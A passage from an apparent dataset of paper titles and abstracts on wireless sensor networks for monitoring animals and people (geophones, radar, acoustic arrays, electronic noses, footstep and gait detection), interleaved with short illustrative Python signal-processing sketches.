The main lessons learned were: the need to factor in the maintenance costs while designing the system; to look carefully at software and hardware interactions; the importance of a rapid initial prototype deployment (this was key to our success); and the need for continuous interaction with domain scientists which allows for unexpected optimizations. --- paper_title: Geophone Detection of Subterranean Termite and Ant Activity paper_content: A geophone system was used to monitor activity of subterranean termites and ants in a desert environment with low vibration noise. Examples of geophone signals were recorded from a colony of Rhytidoponera taurus (Forel), a colony of Camponotus denticulatus Kirby, and a termite colony (undetermined Drepanotermes sp.) under attack by ants from a nearby C. denticulatus colony. The geophone recordings were compared with signals recorded from accelerometers in a citrus grove containing Solenopsis invicta Buren workers. Because of their small size, all of these insects produce relatively weak sounds. Several different types of insect-generated sounds were identified in the geophone recordings, including high-frequency ticks produced by R. taurus and C. denticulatus, and patterned bursts of head bangs produced by Drepanotermes. The S. invicta produced bursts of ticks with three different stridulation frequencies, possibly produced by three different-sized workers. Overall, both systems performed well in enabling identification of high-frequency or patterned pulses. The geophone was more sensitive than the accelerometer to low-frequency signals, but low-frequency insect sound pulses are more difficult to distinguish from background noises than high-frequency pulses. The low cost of multiple-geophone systems may facilitate development of future applications for wide-area subterranean insect monitoring in quiet environments. --- paper_title: Lightweight Signal Processing Algorithms for Human Activity Monitoring using Dual PIR-sensor Nodes paper_content: A dual Pyroelectric InfraRed (PIR) sensor node is used for human activity monitoring by using simple data processing techniques. We first point out the limitations of existing approaches, employing PIR sensors, for activity monitoring. We study the spectral characteristics of the sensor data for the cases of varying distance between the sensor and moving object as well as the speed of the object under observation. The sampled data from two PIR sensors is first processed individually to determine the activity window size, which is then fed to a simple algorithm to determine direction of motion. We also claim that human count can be obtained for special scenarios. Preliminary results of our experimentation show the effectiveness of the simple algorithm proposed and give us an avenue for estimating more involved parameters used for speed and localization. --- paper_title: Finding frequently visited paths: Dealing with the uncertainty of spatio-temporal mobility data paper_content: With the ever-increasing advancements in sensor technology and localization systems, large amounts of spatio-temporal data can be collected from moving objects equipped with wireless sensor nodes. Analysis of such data provides the opportunity of extracting useful information about movement behaviour and interaction between moving objects. Inherent characteristics of wireless sensor nodes cause the data collected by them to have low or irregular frequency and often be erroneous.
Existence of different levels of uncertainty in these data makes the procedure of finding movement patterns difficult and ambiguous. In this paper, we propose a hierarchical approach to find the frequently visited paths using location data of people carrying a custom designed mobile wireless sensor node. We hierarchically cluster trajectories and find their resemblance at the finest level while dealing with the uncertainties. The performance evaluation results show that compared with previous schemes, our method performs better in presence of ambiguity and sources of data uncertainty. --- paper_title: Towards radar-enabled sensor networks paper_content: Ultra wideband radar-enabled wireless sensor networks have the potential to address key detection and classification requirements common to many surveillance and tracking applications. However, traditional radar signal processing techniques are mismatched with the limited computational and storage resources available on typical sensor nodes. The mismatch is exacerbated in noisy, cluttered environments or when the signals have corrupted spectra. To explore the compatibility of ultra wideband radar and mote-class sensor nodes, we designed and built a new platform called the radar mote. An early prototype of this platform was used to detect, classify, and track people and vehicles moving through an outdoor sensor network deployment. This paper describes the sensor's theory of operation, discusses the design and implementation of the radar mote, and presents sample signal waveforms of people, vehicles, noise, and clutter. We demonstrate that radar sensors can be successfully integrated with mote-class devices and imbue them with an extraordinarily useful sensing modality. --- paper_title: Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus paper_content: Summary 1. Animals produce sounds for diverse biological functions such as defending territories, attracting mates, deterring predators, navigation, finding food and maintaining contact with members of their social group. Biologists can take advantage of these acoustic behaviours to gain valuable insights into the spatial and temporal scales over which individuals and populations interact. Advances in bioacoustic technology, including the development of autonomous cabled and wireless recording arrays, permit data collection at multiple locations over time. These systems are transforming the way we study individuals and populations of animals and are leading to significant advances in our understandings of the complex interactions between animals and their habitats. 2. Here, we review questions that can be addressed using bioacoustic approaches, by providing a primer on technologies and approaches used to study animals at multiple organizational levels by ecologists, behaviourists and conservation biologists. 3. Spatially dispersed groups of microphones (arrays) enable users to study signal directionality on a small scale or to locate animals and track their movements on a larger scale. 4. Advances in algorithm development can allow users to discriminate among species, sexes, age groups and individuals. 5. 
With such technology, users can remotely and non-invasively survey populations, describe the soundscape, quantify anthropogenic noise, study species interactions, gain new insights into the social dynamics of sound-producing animals and track the effects of factors such as climate change and habitat fragmentation on phenology and biodiversity. 6. There remain many challenges in the use of acoustic monitoring, including the difficulties in performing signal recognition across taxa. The bioacoustics community should focus on developing a --- paper_title: A PIT tag based analysis of annual movement patterns of adult fire salamanders (Salamandra salamandra) in a Middle European habitat paper_content: We studied patterns of annual movement of individual adult fire salamanders (Salamandra salamandra) during the years 2001 and 2002 in Western Germany in a typical middle European habitat for this species. We tested whether salamanders inhabit small home ranges and move little during the activity period as predicted for a species that shows strong site fidelity to a limited area. Initially, 98 individuals were collected in their natural habitat and marked with passive integrated transponder (PIT) tags. Of those individuals 88 were released at the collection site for recapture during the activity periods of the years 2001 and 2002. Ten marked individuals were kept in captivity to test for the tolerance of PIT tags. We did not find any negative impact of PIT tags on marked individuals of S. salamandra, neither under captive nor natural conditions. Forty-seven of the marked individuals (corresponding to 53% of the 88 released ones) were recaptured at least once and 28 individuals (corresponding to 32%) were recaptured multiple times. The return rate of males (78%) was higher than for females (43%). Mean home range size (and standard deviation) was estimated to 494 ± 282 m 2 for 4 individuals as the minimum convex polygon based on 5 to 6 recapture events for each individual per year and to 1295 ± 853 m 2 for 3 individuals with 8 records over two years. Minimum distances moved inferred from individual recaptures increased during the activity period of both years with time, indicating that individuals have more of a tendency to disperse than to stay within a limited area. Our data suggest therefore that S. salamandra adults display site fidelity, but use a much larger area than hitherto documented for this and other terrestrial salamander species. --- paper_title: Wireless sensor networks for habitat monitoring paper_content: We provide an in-depth study of applying wireless sensor networks to real-world habitat monitoring. A set of system design requirements are developed that cover the hardware design of the nodes, the design of the sensor network, and the capabilities for remote data access and management. A system architecture is proposed to address these requirements for habitat monitoring in general, and an instance of the architecture for monitoring seabird nesting environment and behavior is presented. The currently deployed network consists of 32 nodes on a small island off the coast of Maine streaming useful live data onto the web. The application-driven design exercise serves to identify important areas of further work in data sampling, communications, network retasking, and health monitoring. 
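Both the microphone-array review above and the ENSBox platform cited earlier in this section locate sound sources (calling animals, or acoustic events more generally) by multilateration from spatially dispersed, time-synchronized sensors. The sketch below illustrates the underlying idea with a generic least-squares fit to time-differences of arrival (TDOA); it assumes synchronized sensors at known 2D positions and a constant sound speed, and it is a standard textbook formulation rather than the specific algorithm used by either cited system. All geometry and noise values are illustrative.

```python
# Sketch: 2-D acoustic source localization from time-differences of arrival (TDOA).
# Assumptions (not from the cited papers): synchronized sensors with known
# positions, constant sound speed, illustrative geometry and timing noise.
import numpy as np
from scipy.optimize import least_squares

C = 343.0  # speed of sound in air, m/s

def tdoa_residuals(xy, sensors, tdoa):
    """Residuals between measured and predicted TDOAs w.r.t. sensor 0."""
    d = np.linalg.norm(sensors - xy, axis=1)   # source-to-sensor distances
    pred = (d[1:] - d[0]) / C                  # predicted TDOAs in seconds
    return pred - tdoa

# Hypothetical array geometry (metres) and a true source position for the demo.
rng = np.random.default_rng(0)
sensors = np.array([[0.0, 0.0], [40.0, 0.0], [40.0, 30.0], [0.0, 30.0]])
true_src = np.array([25.0, 12.0])
d_true = np.linalg.norm(sensors - true_src, axis=1)
tdoa_meas = (d_true[1:] - d_true[0]) / C + rng.normal(0, 1e-4, 3)  # timing noise

# Solve for the source position starting from the array centroid.
fit = least_squares(tdoa_residuals, x0=sensors.mean(axis=0),
                    args=(sensors, tdoa_meas))
print("estimated source position:", fit.x)
```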
--- paper_title: ZigBee-based wireless sensor networks for classifying the behaviour of a herd of animals using classification trees paper_content: An in-depth study of wireless sensor networks applied to the monitoring of animal behaviour in the field is described. Herd motion data, such as the pitch angle of the neck and movement velocity, were monitored by an MTS310 sensor board equipped with a 2-axis accelerometer and received signal strength indicator functionality in a single-hop wireless sensor network. Pitch angle measurements and velocity estimates were transmitted through a wireless sensor network based on the ZigBee communication protocol. After data filtering, the pitch angle measurements together with velocity estimates were used to classify the animal behaviour into two classes: activity and inactivity. Considering all the advantages and drawbacks of classification trees compared to neural network and fuzzy logic classifiers, a general classification tree was preferred. The classification tree was constructed based on the measurements of the pitch angle of the neck and movement velocity of some animals in the herd and was used to predict the behaviour of other animals in the herd. The results showed that there was a large improvement in the classification accuracy if both the pitch angle of the neck and the velocity were employed as predictors when compared to just pitch angle or just velocity employed as a single predictor. The classification results showed the possibility of determining a general decision rule which can classify the behaviour of each individual in a herd of animals. The results were confirmed by manual registration and by GPS measurements. --- paper_title: Odor Recognition and Localization Using Sensor Networks paper_content: Odor is usually quantified by five parameters: 1) intensity, 2) degree of offensiveness, 3) character, 4) frequency, and 5) duration. It takes different forms, including gas, chemical, radiation, organic compound, and water odors, the latter including different water contaminations. Many traditional methods have been used to detect such odors for a number of years. However, these methods suffer from different problems, including the detection cost, the long time taken for analysis and detection, and exposing humans to danger. On the other hand, advances in sensing technology have led to the use of sensor networks in many applications. For instance, sensors have been used to monitor animals in habitat areas and to monitor patients' health. In addition, sensor networks have been used to monitor critical infrastructures such as gas, transportation, energy, and water pipelines as well as important buildings. Sensors are tiny devices that can be included in small areas. At the same time, they are capable of capturing different phenomena from the environment, analyzing the collected data, and taking decisions. In addition, sensors are able to form unattended wireless ad hoc networks that can survive for a long time. Such features enable wireless sensor networks (WSN) to play an essential role in odor detection. In fact, odor detection became an important application after the terrorist attack on the Tokyo subway in 1995. Since then, odor detection and localization has been considered an important application. Researchers believe that sensors and sensor networks will play an important role in odor detection and localization.
In this chapter, we generalize the term odor to include the radiation detection and localization since the radiation in most of the recent work is considered as an odor. --- paper_title: A prototype sensor node for footstep detection paper_content: Persons moving over ground can be detected from vibrations induced to soil in the form of seismic waves which are measured by geophones or expensive MEMS accelerometers. We are proposing a sensor node that uses a low-cost bending mode piezoelectric accelerometer, operating near its resonant frequency, specially designed for footstep detection. --- paper_title: A Survey on Wireless Multimedia Sensor Networks paper_content: The availability of low-cost hardware such as CMOS cameras and microphones has fostered the development of Wireless Multimedia Sensor Networks (WMSNs), i.e., networks of wirelessly interconnected devices that are able to ubiquitously retrieve multimedia content such as video and audio streams, still images, and scalar sensor data from the environment. In this paper, the state of the art in algorithms, protocols, and hardware for wireless multimedia sensor networks is surveyed, and open research issues are discussed in detail. Architectures for WMSNs are explored, along with their advantages and drawbacks. Currently off-the-shelf hardware as well as available research prototypes for WMSNs are listed and classified. Existing solutions and open research issues at the application, transport, network, link, and physical layers of the communication protocol stack are investigated, along with possible cross-layer synergies and optimizations. --- paper_title: SensEye: a multi-tier camera sensor network paper_content: This paper argues that a camera sensor network containing heterogeneous elements provides numerous benefits over traditional homogeneous sensor networks. We present the design and implementation of senseye---a multi-tier network of heterogeneous wireless nodes and cameras. To demonstrate its benefits, we implement a surveillance application using senseye comprising three tasks: object detection, recognition and tracking. We propose novel mechanisms for low-power low-latency detection, low-latency wakeups, efficient recognition and tracking. Our techniques show that a multi-tier sensor network can reconcile the traditionally conflicting systems goals of latency and energy-efficiency. An experimental evaluation of our prototype shows that, when compared to a single-tier prototype, our multi-tier senseye can achieve an order of magnitude reduction in energy usage while providing comparable surveillance accuracy. --- paper_title: Acoustic and seismic modalities for unattended ground sensors paper_content: In this paper, we have presented the relative advantages and complementary aspects of acoustic and seismic ground sensors. A detailed description of both acoustic and seismic ground sensing methods has been provided. Acoustic and seismic phenomenology including source mechanisms, propagation paths, attenuation, and sensing have been discussed in detail. The effects of seismo-acoustic and acousto-seismic interactions as well as recommendations for minimizing seismic/acoustic cross talk have been highlighted. We have shown representative acoustic and seismic ground sensor data to illustrate the advantages and complementary aspects of the two modalities. The data illustrate that seismic transducers often respond to acoustic excitation through acousto-seismic coupling. 
Based on these results, we discussed the implications of this phenomenology on the detection, identification, and localization objectives of unattended ground sensors. We have concluded with a methodology for selecting the preferred modality (acoustic and/or seismic) for a particular application. --- paper_title: RFID enhances visitors' museum experience at the Exploratorium paper_content: Interactive RFID-enhanced museum exhibits let visitors continue their scientific exploration beyond the museum's walls. But museums must still help them understand the technology and address their data privacy concerns. --- paper_title: Human activity analysis: A review paper_content: Human activity recognition is an important area of computer vision research. Its applications include surveillance systems, patient monitoring systems, and a variety of systems that involve interactions between persons and electronic devices such as human-computer interfaces. Most of these applications require an automated recognition of high-level activities, composed of multiple simple (or atomic) actions of persons. This article provides a detailed overview of various state-of-the-art research papers on human activity recognition. We discuss both the methodologies developed for simple human actions and those for high-level activities. An approach-based taxonomy is chosen that compares the advantages and limitations of each approach. Recognition methodologies for an analysis of the simple actions of a single person are first presented in the article. Space-time volume approaches and sequential approaches that represent and recognize activities directly from input images are discussed. Next, hierarchical recognition methodologies for high-level activities are presented and compared. Statistical approaches, syntactic approaches, and description-based approaches for hierarchical recognition are discussed in the article. In addition, we further discuss the papers on the recognition of human-object interactions and group activities. Public datasets designed for the evaluation of the recognition methodologies are illustrated in our article as well, comparing the methodologies' performances. This review will provide the impetus for future research in more productive areas. --- paper_title: Analysing Animal Behaviour in Wildlife Videos Using Face Detection and Tracking paper_content: An algorithm that categorises animal locomotive behaviour by combining detection and tracking of animal faces in wildlife videos is presented. As an example, the algorithm is applied to lion faces. The detection algorithm is based on a human face detection method, utilising Haar-like features and AdaBoost classifiers. The face tracking is implemented by applying a specific interest model that combines low-level feature tracking with the detection algorithm. By combining the two methods in a specific tracking model, reliable and temporally coherent detection/tracking of animal faces is achieved. The information generated by the tracker is used to automatically annotate the animal's locomotive behaviour. The annotation classes of locomotive processes for a given animal species are predefined by a large semantic taxonomy on wildlife domain. The experimental results are presented. --- paper_title: Recognising human and animal movement by symmetry paper_content: We show how the symmetry of motion can be extracted by using the generalised symmetry operator for analysing motion and for gait recognition. 
This operator, rather than relying on the borders of a shape or on general appearance, locates features by their symmetrical properties. This approach is reinforced by the view from psychology that human gait is a symmetrical pattern of motion, and by other works. We applied our new method to compare animal gait, and for recognition by gait. Results show that the symmetry properties of gait appear to be unique and can indeed be used for analysis and for recognition. We have so far achieved promising recognition rates of over 95%. Performance analysis also suggests that symmetry enjoys practical advantages such as relative immunity to noise with capability to handle occlusion and as such might prove suitable for applications like clip-database browsing. --- paper_title: Sensor Network for the Monitoring of Ecosystem: Bird Species Recognition paper_content: In this paper, we investigated the performance of bird species recognition using neural networks with different preprocessing methods and different sets of features. Context neural network architecture was designed to embed the dynamic nature of bird songs into inputs. We devised a noise reduction algorithm and effectively applied it to enhance bird species recognition. The performance of the context neural network architecture was comparatively evaluated with linear/mel frequency cepstral coefficients and promising experimental results were achieved. --- paper_title: Human identification experiments using acoustic micro-Doppler signatures paper_content: Active acoustic scene analysis is a promising approach to distributed persistent surveillance in sensor networks. We report on the design of bandpass sampling technique for an acoustic micro-Doppler sonar to reduce the data rate to as low as 85 kbps. We then explore the use of Gaussian mixture models for human identification. We compare the classification performances using different feature vectors and from different sampling schemes. We show that the use of differential cepstral vectors of context length 2 improves the classification accuracy. We also show that the classification performance of the bandpass sampling system with an 8-bit resolution is still over 90% on a database consisting of 160 gait signatures from 8 individuals. --- paper_title: The Statistical Meaning of Kurtosis and Its New Application to Identification of Persons Based on Seismic Signals paper_content: This paper presents a new algorithm making use of kurtosis, which is a statistical parameter, to distinguish the seismic signal generated by a person's footsteps from other signals. It is adaptive to any environment and needs no machine study or training. As persons or other targets moving on the ground generate continuous signals in the form of seismic waves, we can separate different targets based on the seismic waves they generate. The parameter of kurtosis is sensitive to impulsive signals, so it's much more sensitive to the signal generated by person footsteps than other signals generated by vehicles, winds, noise, etc. The parameter of kurtosis is usually employed in the financial analysis, but rarely used in other fields. In this paper, we make use of kurtosis to distinguish person from other targets based on its different sensitivity to different signals. Simulation and application results show that this algorithm is very effective in distinguishing person from other targets. 
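The kurtosis-based footstep identification described in the entry directly above rests on the observation that impulsive footfall transients raise the kurtosis of a seismic window well above that of Gaussian-like background noise (wind, vehicles). The following is a minimal sketch of that idea, assuming a sampled single-axis geophone trace; the sampling rate, window length, and decision threshold are illustrative values, not figures taken from the cited paper.

```python
# Sketch: flag seismic windows whose kurtosis suggests impulsive footsteps.
# Assumptions (not from the cited paper): 1 kHz sampling, 1 s windows, and an
# illustrative decision threshold; a real deployment would tune both.
import numpy as np
from scipy.stats import kurtosis

def footstep_windows(signal, fs=1000, win_s=1.0, threshold=3.0):
    """Return start times (s) of windows with excess kurtosis above threshold."""
    win = int(fs * win_s)
    starts = []
    for i in range(0, len(signal) - win + 1, win):
        frame = signal[i:i + win]
        # Fisher's definition: Gaussian noise gives ~0, impulsive footfalls >> 0.
        if kurtosis(frame, fisher=True, bias=False) > threshold:
            starts.append(i / fs)
    return starts

# Demo on synthetic data: Gaussian noise plus a few footstep-like impulses.
rng = np.random.default_rng(0)
x = rng.normal(0, 1, 10_000)
for t in (2500, 4500, 6500):              # impulsive "footfalls"
    x[t:t + 20] += 8 * np.exp(-np.arange(20) / 5.0)
print(footstep_windows(x))                # windows containing the impulses
```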
--- paper_title: Single- and three-axis geophone: footstep detection with bearing estimation, localization, and tracking paper_content: Tactical capabilities of single and three axis geophones for seismic detection and bearing estimation for homeland security and defense applications are described. It is shown that typically three axis geophones yield a high bearing estimation error. An alternate bearing estimation approach is based on using the time delay in footstep signal detection from three triangulated single axis vertical geophones. In this approach the standard deviation of the bearing estimation error is less than 12 degrees for a walking person distance of 10 to 70 m and geophone distances of 8 to 9 m. We find that using the three-axis geophone approach makes it harder for path tracking and bearing estimation within the tactical zone area. We report that a single-axis geophone approach for triangulation of a walking person is more effective. In addition, road monitoring is also more efficient using a single-axis geophone approach. We compare the relative and absolute improvement of bearing estimation probability for road monitoring using three single-axis geophones versus 1, 2 and 3 three-axis geophones. We will also discuss the use of single axis vertical geophone sets for monitoring various zone sizes. --- paper_title: Detecting Stink Bugs/Damage in Cotton Utilizing a Portable Electronic Nose paper_content: The goal of this study was to develop effective and affordable tools for detecting stink bugs and stink bug induced damage in cotton production. A commercially available electronic nose (Cyranose 320) was used for this purpose and its performance was evaluated under laboratory and field conditions. The volatile compounds given off by stink bugs were identified to be trans-2-decenal and trans-2-octenal. The E-nose was trained to identify stink bugs' (presence) smell prints. Only four sensors, out of 32 available, responded to volatile chemicals produced by bugs. The same sensors showed identical responses (smell prints) to trans-2-decenal as compared to those obtained from stink bugs. Also, under laboratory conditions, the Cyranose accurately predicted damaged bolls, interior walls of bolls and locks with lint and seed approximately 95 percent of the time. Under laboratory conditions, the E-nose identified the presence of stink bugs 100 percent of the time. There was a strong correlation (R2 = 0.95) between the number of stink bugs in a sample and the Cyranose sensors' response. Under field conditions, the E-nose was able to identify stink bug damaged bolls 67% of the time. --- paper_title: Gas-Chromatographic Analyses of the Subcaudal Gland Secretion of the European Badger (Meles meles) Part II: Time-Related Variation in the Individual-Specific Composition paper_content: Individuality in body odors has been described in a variety of species, but studies on time-related variation in individual scent are scarce. Here, we use GC-MS to investigate how chemical composition of subcaudal gland secretions of European badgers (Meles meles) varies over days, seasons, and from year to year, and how secretions change with the length of time for which they are exposed to the environment. Samples were divided into subsamples—one was frozen immediately and the remaining ones frozen after 2, 6, 12, 24, and 48 hr, respectively—and many individual-specific characteristics of the scent-profiles remained stable over time.
However, two components were negatively correlated with time, thus providing the possibility to determine the age of scent marks. The low variation found in scent profiles of samples collected from the same individual three days apart showed that the individual-specific scent is a true characteristic of the respective badger, and that trapping and subsequent sampling have little effect on the composition of subcaudal gland secretions. Long-term variation (i.e., over one year) in individual subcaudal scent profiles is not continuous, but periods of relative stability are followed by periods of rapid change, that can be related to badger biology. Annual variation between samples collected from the same individuals in winter 1998 and winter 1999, and in spring 1998 and spring 1999 was lower than seasonal variation. Therefore, the results of this study indicate the potential of an individual-specific scent signature in the subcaudal gland secretions of badgers evidencing that individual recognition is of high importance in this species. --- paper_title: Footstep detection and tracking paper_content: Persons or vehicles moving over ground generate a succession of impacts; these soil disturbances propagate away from the source as seismic waves. These seismic waves are especially useful in detecting footsteps which cannot be detected acoustically. Footstep signals can be distinguished from other seismic sources, such as vehicles or wind noise, by their impulsive nature. Even in noisy environments, statistical measures of the seismic amplitude distribution, such as kurtosis, can be used to identify a footstep. These detection methods can be used even with single component geophones. Moreover, the seismic signal is a vector wave that can be used to track the source bearing. To do such tracking a three-component measurement is needed. If multiple sources are separated in angle, we can use this bearing information to estimate the number of walkers. --- paper_title: Mammalian social odours: attraction and individual recognition paper_content: Mammalian social systems rely on signals passed between individuals conveying information including sex, reproductive status, individual identity, ownership, competitive ability and health status. Many of these signals take the form of complex mixtures of molecules sensed by chemosensory systems and have important influences on a variety of behaviours that are vital for reproductive success, such as parent-offspring attachment, mate choice and territorial marking. This article aims to review the nature of these chemosensory cues and the neural pathways mediating their physiological and behavioural effects. Despite the complexities of mammalian societies, there are instances where single molecules can act as classical pheromones attracting interest and approach behaviour. Chemosignals with relatively high volatility can be used to signal at a distance and are sensed by the main olfactory system. Most mammals also possess a vomeronasal system, which is specialized to detect relatively non-volatile chemosensory cues following direct contact. Single attractant molecules are sensed by highly specific receptors using a labelled line pathway. These act alongside more complex mixtures of signals that are required to signal individual identity. There are multiple sources of such individuality chemosignals, based on the highly polymorphic genes of the major histocompatibility complex (MHC) or lipocalins such as the mouse major urinary proteins. 
The individual profile of volatile components that make up an individual odour signature can be sensed by the main olfactory system, as the pattern of activity across an array of broadly tuned receptor types. In addition, the vomeronasal system can respond highly selectively to non-volatile peptide ligands associated with the MHC, acting at the V2r class of vomeronasal receptor. The ability to recognize individuals or their genetic relatedness plays an important role in mammalian social behaviour. Thus robust systems for olfactory learning and recognition of chemosensory individuality have evolved, often associated with major life events, such as mating, parturition or neonatal development. These forms of learning share common features, such as increased noradrenaline evoked by somatosensory stimulation, which results in neural changes at the level of the olfactory bulb. In the main olfactory bulb, these changes are likely to refine the pattern of activity in response to the learned odour, enhancing its discrimination from those of similar odours. In the accessory olfactory bulb, memory formation is hypothesized to involve a selective inhibition, which disrupts the transmission of the learned chemosignal from the mating male. Information from the main olfactory and vomeronasal systems is integrated at the level of the corticomedial amygdala, which forms the most important pathway by which social odours mediate their behavioural and physiological effects. Recent evidence suggests that this region may also play an important role in the learning and recognition of social chemosignals. --- paper_title: An Electronic Nose Network System for Online Monitoring of Livestock Farm Odors paper_content: An electronic nose (e-nose)-based network system is developed for monitoring odors in and around livestock farms remotely. This network is built from compact e-noses that are tailored to measure odor compounds and environmental conditions such as temperature, wind speed, and humidity. The e-noses are placed at various applicable locations in and around the farm, and the collected odor data are transmitted via wireless network to a computer server, where the data processing algorithms process and analyze the data. The developed e-nose network system enables more effective odor management capabilities for more efficient operation of odor control practice by providing consistent, comprehensive, real-time data about the environment and odor profile in and around the livestock farms. Experimental and simulation results demonstrate the effectiveness of the developed system. --- paper_title: Identification of Stink Bugs Using an Electronic Nose paper_content: Abstract Stink bugs are recognized as pests of several economically important crops, including cotton, soybean and a variety of tree fruits. The Cyranose 320 was used for the classified investigation of stink bug. Stink bugs including males and females of the southern green stink bugs, Nezara viridula , were collected from crop fields around College Station, TX. Results show that the released chemicals and chemical intensity are both critical factors, which determine the rate that the Cyranose 320 correctly identified the stink bugs. The Cyranose 320 shows significant potential in identifying stink bugs, and can classify stink bug samples by species and gender. 
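The electronic-nose entries above (the livestock farm odour monitoring network, and the Cyranose 320 stink bug studies) all reduce a multi-channel chemical sensor array to a small feature space before classifying the odour. A common processing chain for such data is dimensionality reduction followed by a simple classifier; the sketch below shows one such chain, PCA plus k-nearest neighbours, on hypothetical 32-channel array responses. The data, channel count, and classifier choice are illustrative assumptions and do not reproduce the exact pipelines of the cited papers, which also handle baseline drift and humidity correction.

```python
# Sketch: classify electronic-nose array responses with PCA + k-NN.
# Assumptions (not from the cited papers): 32 sensor channels and synthetic
# responses for two odour classes, generated only for illustration.
import numpy as np
from sklearn.decomposition import PCA
from sklearn.neighbors import KNeighborsClassifier
from sklearn.pipeline import make_pipeline

rng = np.random.default_rng(1)
n_per_class, n_sensors = 40, 32

# Hypothetical "smell prints": each class has its own mean response pattern.
pattern_a = rng.uniform(0.5, 1.5, n_sensors)
pattern_b = rng.uniform(0.5, 1.5, n_sensors)
class_a = pattern_a + rng.normal(0, 0.1, size=(n_per_class, n_sensors))
class_b = pattern_b + rng.normal(0, 0.1, size=(n_per_class, n_sensors))
X = np.vstack([class_a, class_b])
y = np.array([0] * n_per_class + [1] * n_per_class)

# Project onto a few principal components, then classify by nearest neighbours.
model = make_pipeline(PCA(n_components=3), KNeighborsClassifier(n_neighbors=3))
model.fit(X, y)
print("training accuracy:", model.score(X, y))
```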
--- paper_title: Estimation of crowd behavior using sensor networks and sensor fusion paper_content: Commonly, surveillance operators are today monitoring a large number of CCTV screens, trying to solve the complex cognitive tasks of analyzing crowd behavior and detecting threats and other abnormal behavior. Information overload is a rule rather than an exception. Moreover, CCTV footage lacks important indicators revealing certain threats, and can also in other respects be complemented by data from other sensors. This article presents an approach to automatically interpret sensor data and estimate behaviors of groups of people in order to provide the operator with relevant warnings. We use data from distributed heterogeneous sensors (visual cameras and a thermal infrared camera), and process the sensor data using detection algorithms. The extracted features are fed into a Hidden Markov Model in order to model normal behavior and detect deviations. We also discuss the use of radars for weapon detection. --- paper_title: Spectrum analysis techniques for personnel detection using seismic sensors paper_content: There is a general need for improved detection range and false alarm performance for seismic sensors used for personnel detection. In this paper we describe a novel footstep detection algorithm which was developed and run on seismic footstep data collected at the Aberdeen Proving Ground in December 2000. The initial focus was an assessment of achievable detection range. The conventional approach to footstep detection is to detect transients corresponding to individual footfalls. We feel this is an error-prone approach. Because many real-world signals unrelated to human locomotion look like transients, transient-based footstep detection will inevitably either suffer from high false alarm rates or will be insensitive. Instead, we examined the use of spectrum analysis on envelope-detected seismic signals and have found the general method to be quite promising, not only for detection, but also for discrimination against other types of seismic sources. In particular, gait patterns and their corresponding signatures may help discriminate between human intruders and animals. In the APG data set, mean detection ranges of 64 meters (at P D =50%) were observed for normal walking, significantly improving on ranges previously reported. For running, mean detection ranges of 84 meters were observed. However, stealthy walking (creeping) remains a considerable problem. Even at short ranges (10 meters), in some cases the detection rate was less than 50%. In future efforts, additional data sets for a range of geologic and environmental conditions should be acquired and analyzed. Improvements to the detection algorithms are possible, including estimation of direction of travel and the number of intruders. --- paper_title: Acoustic Micro-Doppler Gait Signatures of Humans and Animals paper_content: A micro-Doppler active acoustic sensing system is described. We report its use in acquiring gait signatures of humans and four-legged animals in indoor and outdoor environments. Signals from an accelerometer attached to the leg support the interpretation of the components in the measured micro-Doppler signature. The acoustic micro-Doppler system described in this paper is simpler and offers advantages over the widely used electromagnetic wave micro-Doppler radars. It can be implemented in custom integrated circuits and embedded in a multi-modal wireless sensor network for autonomous detection and classification. 
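The seismic spectrum-analysis entry above argues for detecting walkers from the periodicity of the envelope-detected geophone signal (which concentrates energy near the gait cadence) rather than from individual footfall transients. The sketch below illustrates that idea under stated assumptions: a Hilbert-transform envelope followed by a search for the strongest spectral line in a nominal 0.5-3 Hz cadence band. The sampling rate, band limits, and synthetic demo signal are illustrative and not the cited paper's exact implementation.

```python
# Sketch: look for a gait-rate peak in the spectrum of an envelope-detected
# seismic signal. Assumptions (not from the cited paper): 500 Hz sampling and
# an illustrative 0.5-3 Hz cadence band.
import numpy as np
from scipy.signal import hilbert

def cadence_peak(signal, fs=500.0, band=(0.5, 3.0)):
    """Return (frequency, relative strength) of the strongest envelope
    spectral line inside the cadence band."""
    env = np.abs(hilbert(signal))          # envelope detection
    env = env - env.mean()                 # remove DC before the FFT
    spec = np.abs(np.fft.rfft(env))
    freqs = np.fft.rfftfreq(len(env), d=1.0 / fs)
    in_band = (freqs >= band[0]) & (freqs <= band[1])
    k = np.argmax(spec * in_band)          # out-of-band bins are zeroed
    return freqs[k], spec[k] / (spec[in_band].mean() + 1e-12)

# Demo: noise plus footfall impulses at 2 steps per second.
rng = np.random.default_rng(2)
fs, dur = 500, 20
x = rng.normal(0, 1, fs * dur)
for t in np.arange(0.5, dur, 0.5):         # one footfall every 0.5 s
    i = int(t * fs)
    x[i:i + 25] += 6 * np.exp(-np.arange(25) / 6.0)
print(cadence_peak(x, fs))                 # expect a peak near 2 Hz
```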
--- paper_title: Radar micro-doppler for long range front-view gait recognition paper_content: We seek to understand the extraction of radar micro-Doppler signals generated by human motions at long range and with a front-view to use them as a biometric. We describe micro-Doppler algorithms used for the detection and tracking, and detail the gait features that can be extracted. We have measurements of multiple human subjects in outdoor but low-clutter backgrounds for identification and find that at long range and front-view, the probability of correct classification can be over 80%. However, the micro-Doppler signals are dependent on the direction of motion, and we discuss methods to reduce the effect of the direction of motion. These radar biometric features can serve as identifying features in a scene with multiple subjects. Ground truth using video and GPS is used to validate the radar data. --- paper_title: Geophone Detection of Subterranean Termite and Ant Activity paper_content: A geophone system was used to monitor activity of subterranean termites and ants in a desert environment with low vibration noise. Examples of geophone signals were recorded from a colony of Rhytidoponera taurus (Forel), a colony of Camponotus denticulatus Kirby, and a termite colony (undetermined Drepanotermes sp.) under attack by ants from a nearby C. denticulatus colony. The geophone recordings were compared with signals recorded from accelerometers in a citrus grove containing Solenopsis invicta Buren workers. Because of their small size, all of these insects produce relatively weak sounds. Several different types of insect-generated sounds were identified in the geophone recordings, including high-frequency ticks produced by R. taurus and C. denticulatus, and patterned bursts of head bangs produced by Drepanotermes. The S. invicta produced bursts of ticks with three different stridulation frequencies, possibly produced by three different-sized workers. Overall, both systems performed well in enabling identification of high-frequency or patterned pulses. The geophone was more sensitive than the accelerometer to low-frequency signals, but low-frequency insect sound pulses are more difficult to distinguish from background noises than high-frequency pulses. The low cost of multiple-geophone systems may facilitate development of future applications for wide-area subterranean insect monitoring in quiet environments. --- paper_title: Seismic signal transmission between burrows of the Cape mole-rat, Georychus capensis paper_content: Both seismic and auditory signals were tested for their propagation characteristics in a field study of the Cape mole-rat (Georychus capensis), a subterranean rodent in the family Bathyergidae. This 